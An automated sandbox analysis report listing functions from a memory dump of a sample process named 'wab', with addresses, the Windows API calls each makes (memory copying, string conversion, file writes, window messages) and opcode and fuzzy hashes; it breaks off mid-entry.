                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                      • String ID:
                      • API String ID: 3550944819-0
                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                      Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                      • wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • memcpy.MSVCRT ref: 0040A94F
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocwcslen
                      • String ID:
                      • API String ID: 3023356884-0
                      • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                      • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                      Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      • wcslen.MSVCRT ref: 0040B1DE
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                      • memcpy.MSVCRT ref: 0040B248
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocwcslen
                      • String ID:
                      • API String ID: 3023356884-0
                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                      Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: @
                      • API String ID: 3510742995-2766056989
                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                      Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID:
                      • API String ID: 1865533344-0
                      • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                      • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                      Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                      Download Yara Rule
                      APIs
                      • strlen.MSVCRT ref: 0040B0D8
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                      • memcpy.MSVCRT ref: 0040B159
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocstrlen
                      • String ID:
                      • API String ID: 1171893557-0
                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                      Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004144E7
                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                      • memset.MSVCRT ref: 0041451A
                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                      • String ID:
                      • API String ID: 1127616056-0
                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                      Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: sqlite_master
                      • API String ID: 438689982-3163232059
                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                      Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                      Download Yara Rule
                      APIs
                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                      • wcscpy.MSVCRT ref: 00414DF3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: BrowseFolderFromListMallocPathwcscpy
                      • String ID:
                      • API String ID: 3917621476-0
                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                      Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • _snwprintf.MSVCRT ref: 00410FE1
                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • _snwprintf.MSVCRT ref: 0041100C
                      • wcscat.MSVCRT ref: 0041101F
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                      • String ID:
                      • API String ID: 822687973-0
                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                      Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                      Download Yara Rule
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                      • malloc.MSVCRT ref: 00417459
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@malloc
                      • String ID:
                      • API String ID: 4284152360-0
                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                      Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                      • RegisterClassW.USER32(?), ref: 00412428
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleModule$ClassCreateRegisterWindow
                      • String ID:
                      • API String ID: 2678498856-0
                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                      Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,?), ref: 00409B40
                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$Item
                      • String ID:
                      • API String ID: 3888421826-0
                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                      Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00417B7B
                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                      • GetLastError.KERNEL32 ref: 00417BB5
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$ErrorLastLockUnlockmemset
                      • String ID:
                      • API String ID: 3727323765-0
                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                      Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                      • malloc.MSVCRT ref: 00417407
                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@malloc
                      • String ID:
                      • API String ID: 4284152360-0
                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                      Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040F673
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                      • strlen.MSVCRT ref: 0040F6A2
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                      Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040F6E2
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                      • strlen.MSVCRT ref: 0040F70D
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                      Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00402FD7
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                      • strlen.MSVCRT ref: 00403006
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                      Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                      • GetStockObject.GDI32(00000000), ref: 004143C6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                      • String ID:
                      • API String ID: 764393265-0
                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                      Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                      Download Yara Rule
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Time$System$File$LocalSpecific
                      • String ID:
                      • API String ID: 979780441-0
                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                      Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • memcpy.MSVCRT ref: 004134E0
                      • memcpy.MSVCRT ref: 004134F2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$DialogHandleModuleParam
                      • String ID:
                      • API String ID: 1386444988-0
                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                      Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                      Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: InvalidateMessageRectSend
                      • String ID: d=E
                      • API String ID: 909852535-3703654223
                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                      Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                      Download Yara Rule
                      APIs
                      • wcschr.MSVCRT ref: 0040F79E
                      • wcschr.MSVCRT ref: 0040F7AC
                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                        • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcschr$memcpywcslen
                      • String ID: "
                      • API String ID: 1983396471-123907689
                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                      Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • _memicmp.MSVCRT ref: 0040C00D
                      • memcpy.MSVCRT ref: 0040C024
                      Strings
                      Memory Dump Source
